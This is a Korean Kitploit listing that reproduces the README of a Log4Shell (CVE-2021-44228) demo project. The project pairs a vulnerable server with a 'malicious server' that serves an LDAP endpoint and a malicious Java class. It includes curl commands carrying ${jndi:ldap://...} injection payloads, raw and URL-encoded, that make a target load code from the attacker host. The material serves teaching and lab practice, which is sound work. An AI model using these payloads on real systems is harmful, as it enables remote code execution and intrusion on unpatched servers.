Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Log4Shell-demo — Log4Shell / CVE-2021-44228 취약점이 어떻게 작동하는지 보여주는 데모 | Kitploit
도구/GitHubGitHub/mschmnet/log4shell-demo
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubmschmnet/log4shell-demo

Log4Shell-demo

Log4Shell / CVE-2021-44228 취약점이 어떻게 작동하는지 보여주는 데모

저장소 보기
7114년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Log4Shell 실제 동작

이 프로젝트는 Log4Shell / CVE-2021-44228 취약점이 어떻게 작동하는지 시연하는 것을 목표로 합니다.

요구 사항

Docker만 설치되어 있으면 됩니다. 이상적으로는 두 대의 다른 가상 머신이 있는 것이 좋습니다. 하나는 _취약한 서버_용이고, 다른 하나는 악성 코드베이스와 LDAP 서버를 호스팅할 _악성 서버_용입니다.

선택적으로 _Make_와 _Docker Compose_가 설치되어 있을 수 있지만, 이는 필수가 아닙니다. 이 저장소에는 이러한 요구 사항을 건너뛰고 Docker 컨테이너 내에서 사용할 수 있는 make.sh도 포함되어 있기 때문입니다.

Docker 설치 (선택 사항)

아직 설치하지 않았다면, 다음은 Debian VM에 Docker를 설치하는 단계입니다. 이 단계를 사용할 수 있습니다: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

저장소 다운로드

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

취약한 서버 설치

root@kitploit:~
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed

악성 서버 시작

이 명령은 기본 LDAP 서버와 악성 Java 클래스를 제공하는 기본 Python 서버를 시작합니다.

이러한 서버가 사용 가능할 IP 주소 또는 도메인 이름을 제공해야 합니다.

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed

대상 서버를 공격하는 방법

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

또는

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

여기서 ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}는 URL 인코딩된 것입니다.

중지하는 방법

root@kitploit:~
../make.sh stop

로그를 확인하는 방법

root@kitploit:~
../make.sh logs 

슬라이드

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

도구 다운로드